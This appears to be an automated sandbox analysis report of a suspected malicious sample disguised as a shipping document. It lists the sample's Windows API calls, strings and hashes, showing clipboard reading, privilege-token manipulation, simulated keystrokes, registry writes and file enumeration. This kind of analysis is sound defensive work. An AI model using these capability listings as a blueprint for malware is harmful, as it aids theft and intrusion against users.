                                                                                                                              • Instruction ID: b100615c9dfdccba7f80db1751ea06514a43d099f2deda2991b43e7de1906660
                                                                                                                              • Opcode Fuzzy Hash: 9bbd21c049c3247b30d99c7c5392d2c475b6b98eaf3adfe5461bfb5c3d4c2816
                                                                                                                              • Instruction Fuzzy Hash: FDE09279500A01CEC7314F1AE908652FBE8FEE13713228B2ED4E6826A0D3B1588A8F50
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00EA1C99
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348490692.0000000000E9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9F000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e9f000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                              • Instruction ID: 2b015058f7f91ea3f9bf617e3b3ef2a6ce27945037e8bdb647801dfffa7fdeaf
                                                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                              • Instruction Fuzzy Hash: E5E0E67498410DDFDB00DFB4D6496DD7BB4EF04301F1002A1FD01E2280D6309D508A62
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A3CBA1
                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A3CBFF
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A3CC40
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A3CC6A
                                                                                                                              • SendMessageW.USER32 ref: 00A3CC93
                                                                                                                              • _wcsncpy.LIBCMT ref: 00A3CCFF
                                                                                                                              • GetKeyState.USER32(00000011), ref: 00A3CD20
                                                                                                                              • GetKeyState.USER32(00000009), ref: 00A3CD2D
                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A3CD43
                                                                                                                              • GetKeyState.USER32(00000010), ref: 00A3CD4D
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A3CD76
                                                                                                                              • SendMessageW.USER32 ref: 00A3CD9D
                                                                                                                              • SendMessageW.USER32(?,00001030,?,00A3B37C), ref: 00A3CEA1
                                                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A3CEB7
                                                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A3CECA
                                                                                                                              • SetCapture.USER32(?), ref: 00A3CED3
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00A3CF38
                                                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A3CF45
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A3CF5F
                                                                                                                              • ReleaseCapture.USER32(?,?,?), ref: 00A3CF6A
                                                                                                                              • GetCursorPos.USER32(?), ref: 00A3CFA4
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00A3CFB1
                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A3D00D
                                                                                                                              • SendMessageW.USER32 ref: 00A3D03B
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A3D078
                                                                                                                              • SendMessageW.USER32 ref: 00A3D0A7
                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A3D0C8
                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A3D0D7
                                                                                                                              • GetCursorPos.USER32(?), ref: 00A3D0F7
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00A3D104
                                                                                                                              • GetParent.USER32(?), ref: 00A3D124
                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A3D18D
                                                                                                                              • SendMessageW.USER32 ref: 00A3D1BE
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00A3D21C
                                                                                                                              • TrackPopupMenuEx.USER32 ref: 00A3D24C
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A3D276
                                                                                                                              • SendMessageW.USER32 ref: 00A3D299
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00A3D2EB
                                                                                                                              • TrackPopupMenuEx.USER32 ref: 00A3D31F
                                                                                                                                • Part of subcall function 009B25DB: GetWindowLongW.USER32(?,000000EB), ref: 009B25EC
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A3D3BB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                              • String ID: @GUI_DRAGID$F
                                                                                                                              • API String ID: 3977979337-4164748364
                                                                                                                              • Opcode ID: f4d2ca4339579dda864911ccdfea8b82184f36fa3033fee13120f1f5244cd29b
                                                                                                                              • Instruction ID: 7683b2422ab630b7ee4677fb0be9b9fd7e5e686bcfe3039840078ac98c6a3411
                                                                                                                              • Opcode Fuzzy Hash: f4d2ca4339579dda864911ccdfea8b82184f36fa3033fee13120f1f5244cd29b
                                                                                                                              • Instruction Fuzzy Hash: D842AB31604341EFDB24CF68CC45EAABBE5FF49320F144A29F599A72A0C772D855CB92
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$_memset
                                                                                                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                              • API String ID: 1357608183-1798697756
                                                                                                                              • Opcode ID: ef8ac069a9314afc7485ea46750a4cf4b7dbc7d9e7ab5afb304fdc1fa0d3e16c
                                                                                                                              • Instruction ID: 1886507fcf792ee372ac155da900400aac94c1e507be0c9e1b2e1f928457cf9a
                                                                                                                              • Opcode Fuzzy Hash: ef8ac069a9314afc7485ea46750a4cf4b7dbc7d9e7ab5afb304fdc1fa0d3e16c
                                                                                                                              • Instruction Fuzzy Hash: B9939F75E00219DBDF24CF98E885BADB7B1FF48310F24856AE955AB2D0E7749E81CB40
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 009B4A3D
                                                                                                                              • FindWindowW.USER32 ref: 009ED9BE
                                                                                                                              • IsIconic.USER32(?), ref: 009ED9C7
                                                                                                                              • ShowWindow.USER32(?,00000009), ref: 009ED9D4
                                                                                                                              • SetForegroundWindow.USER32(?), ref: 009ED9DE
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009ED9F4
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 009ED9FB
                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 009EDA07
                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 009EDA18
                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 009EDA20
                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 009EDA28
                                                                                                                              • SetForegroundWindow.USER32(?), ref: 009EDA2B
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009EDA40
                                                                                                                              • keybd_event.USER32 ref: 009EDA4B
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009EDA55
                                                                                                                              • keybd_event.USER32 ref: 009EDA5A
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009EDA63
                                                                                                                              • keybd_event.USER32 ref: 009EDA68
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009EDA72
                                                                                                                              • keybd_event.USER32 ref: 009EDA77
                                                                                                                              • SetForegroundWindow.USER32(?), ref: 009EDA7A
                                                                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 009EDAA1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 4125248594-2988720461
                                                                                                                              • Opcode ID: af37f0fbdf7b2380786cb0c9002a482804621b6368bf18b2658dacf6c1dca7cf
                                                                                                                              • Instruction ID: 9ee79e9a27ff0b6629f2c2f3a17f71fb372be54d7cb986d10eda19b5dbc21e1d
                                                                                                                              • Opcode Fuzzy Hash: af37f0fbdf7b2380786cb0c9002a482804621b6368bf18b2658dacf6c1dca7cf
                                                                                                                              • Instruction Fuzzy Hash: F4315371E51358BFEB21AFA29C4AF7E7E6CEB44B50F104035FA05EA1D1D6B05D01AAA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A08AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A08AED
                                                                                                                                • Part of subcall function 00A08AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A08B1A
                                                                                                                                • Part of subcall function 00A08AA3: GetLastError.KERNEL32 ref: 00A08B27
                                                                                                                              • _memset.LIBCMT ref: 00A0867B
                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A086CD
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A086DE
                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A086F5
                                                                                                                              • GetProcessWindowStation.USER32 ref: 00A0870E
                                                                                                                              • SetProcessWindowStation.USER32 ref: 00A08718
                                                                                                                              • OpenDesktopW.USER32 ref: 00A08732
                                                                                                                                • Part of subcall function 00A084F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A08631), ref: 00A08508
                                                                                                                                • Part of subcall function 00A084F3: CloseHandle.KERNEL32(?), ref: 00A0851A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                              • String ID: $default$winsta0
                                                                                                                              • API String ID: 2063423040-1027155976
                                                                                                                              • Opcode ID: 71f58f86d3c33d37c1393a35c454bc3f718d62dadc753572de55a9dc013ead21
                                                                                                                              • Instruction ID: 7cd9571dd6b7c3a943eab03a0acb6d1ee3e40ed262ad5a7a2015e3b236c425d0
                                                                                                                              • Opcode Fuzzy Hash: 71f58f86d3c33d37c1393a35c454bc3f718d62dadc753572de55a9dc013ead21
                                                                                                                              • Instruction Fuzzy Hash: D981897180020DAFDF11DFA4ED45AEE7BB8EF04344F148129F854A62A1DB398E19DB24
                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32(00A3F910), ref: 00A240A6
                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A240B4
                                                                                                                              • GetClipboardData.USER32 ref: 00A240BC
                                                                                                                              • CloseClipboard.USER32 ref: 00A240C8
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A240E4
                                                                                                                              • CloseClipboard.USER32 ref: 00A240EE
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A24103
                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00A24110
                                                                                                                              • GetClipboardData.USER32 ref: 00A24118
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A24125
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A24159
                                                                                                                              • CloseClipboard.USER32 ref: 00A24269
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3222323430-0
                                                                                                                              • Opcode ID: 1a1fda456d580ae8074e67a545c2fe306b3714e4bd19414758ea4c288925af4b
                                                                                                                              • Instruction ID: 0d829c3e42beb52bfe6b1c4eb2a49e89bbf9d2d3839444ca5fbcbd7dcaff4873
                                                                                                                              • Opcode Fuzzy Hash: 1a1fda456d580ae8074e67a545c2fe306b3714e4bd19414758ea4c288925af4b
                                                                                                                              • Instruction Fuzzy Hash: E1518F35608315AFD310EFA4ED86FAF77A8AF98B10F004539F646D21A1DF70D9068B62
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A1C819
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1C86D
                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A1C892
                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A1C8A9
                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A1C8D0
                                                                                                                              • __swprintf.LIBCMT ref: 00A1C91C
                                                                                                                              • __swprintf.LIBCMT ref: 00A1C95F
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                              • __swprintf.LIBCMT ref: 00A1C9B3
                                                                                                                                • Part of subcall function 009D3818: __woutput_l.LIBCMT ref: 009D3871
                                                                                                                              • __swprintf.LIBCMT ref: 00A1CA01
                                                                                                                                • Part of subcall function 009D3818: __flsbuf.LIBCMT ref: 009D3893
                                                                                                                                • Part of subcall function 009D3818: __flsbuf.LIBCMT ref: 009D38AB
                                                                                                                              • __swprintf.LIBCMT ref: 00A1CA50
                                                                                                                              • __swprintf.LIBCMT ref: 00A1CA9F
                                                                                                                              • __swprintf.LIBCMT ref: 00A1CAEE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                              • API String ID: 3953360268-2428617273
                                                                                                                              • Opcode ID: 2059b9d0b2b3e4d9c8b2db2bd9a7c6f8a7f926b1c0e0fa0d20ca2c4d8a06d597
                                                                                                                              • Instruction ID: e1a22b5ee3e1d51a9277e87fd5bdcfb84bc39ce97bc1c398af3a3290aec39720
                                                                                                                              • Opcode Fuzzy Hash: 2059b9d0b2b3e4d9c8b2db2bd9a7c6f8a7f926b1c0e0fa0d20ca2c4d8a06d597
                                                                                                                              • Instruction Fuzzy Hash: 89A12DB2418304ABC710EFA4C986EEFB7ECEFD5714F40491EB585D6191EA34DA48CB62
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00A1F042
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F057
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F06E
                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00A1F080
                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00A1F09A
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A1F0B2
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1F0BD
                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00A1F0D9
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F100
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F117
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A1F129
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00A68920), ref: 00A1F147
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A1F151
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1F15E
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1F170
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 1803514871-438819550
                                                                                                                              • Opcode ID: 1bd4c97627980718a7a448af90f8bd2e8706287c67aadbabe596bb8761140324
                                                                                                                              • Instruction ID: 2ee7c1d63f04036d2f9659567db1cc402b7735ebd69aa21e33cfe4c430dba878
                                                                                                                              • Opcode Fuzzy Hash: 1bd4c97627980718a7a448af90f8bd2e8706287c67aadbabe596bb8761140324
                                                                                                                              • Instruction Fuzzy Hash: F231F532900249BECB10DBF0DC59AEF77ACAF49320F144276F904D31A0EB34DA85CA64
                                                                                                                              APIs
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A309DE
                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A3F910,00000000,?,00000000,?,?), ref: 00A30A4C
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A30A94
                                                                                                                              • RegSetValueExW.ADVAPI32 ref: 00A30B1D
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A30E3D
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A30E4A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                              • API String ID: 536824911-966354055
                                                                                                                              • Opcode ID: ed0a9b792328b70f55c45c70d80380ca8b3406799c4e59c167862372010b42ae
                                                                                                                              • Instruction ID: d57a41d952df25a6adafbee71750e17b54ca47bea9762e9804d17d2f9d93f692
                                                                                                                              • Opcode Fuzzy Hash: ed0a9b792328b70f55c45c70d80380ca8b3406799c4e59c167862372010b42ae
                                                                                                                              • Instruction Fuzzy Hash: 720248756106019FCB14EF28C995E6AB7E5FF89724F04885DF98A9B362CB30ED05CB81
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00A1F19F
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F1B4
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F1CB
                                                                                                                                • Part of subcall function 00A143C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A143E1
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A1F1FA
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1F205
                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00A1F221
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F248
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1F25F
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A1F271
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00A68920), ref: 00A1F28F
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A1F299
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1F2A6
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1F2B8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 1824444939-438819550
                                                                                                                              • Opcode ID: 50656611e96d7d124ed199504ceb5fd29a3d7b1446ca5db0cd61efa49e9042ac
                                                                                                                              • Instruction ID: ceac806c706f6a3d21051b012ee148bb0f978230befa7704b2bfe3c37098c88d
                                                                                                                              • Opcode Fuzzy Hash: 50656611e96d7d124ed199504ceb5fd29a3d7b1446ca5db0cd61efa49e9042ac
                                                                                                                              • Instruction Fuzzy Hash: F731F43690029ABECF10DFB4DC59ADE77ACAF45360F144276F814A31A0DB31DE86CA54
                                                                                                                              APIs
                                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A1A299
                                                                                                                              • __swprintf.LIBCMT ref: 00A1A2BB
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A1A2F8
                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A1A31D
                                                                                                                              • _memset.LIBCMT ref: 00A1A33C
                                                                                                                              • _wcsncpy.LIBCMT ref: 00A1A378
                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A1A3AD
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A1A3B8
                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00A1A3C1
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A1A3CB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
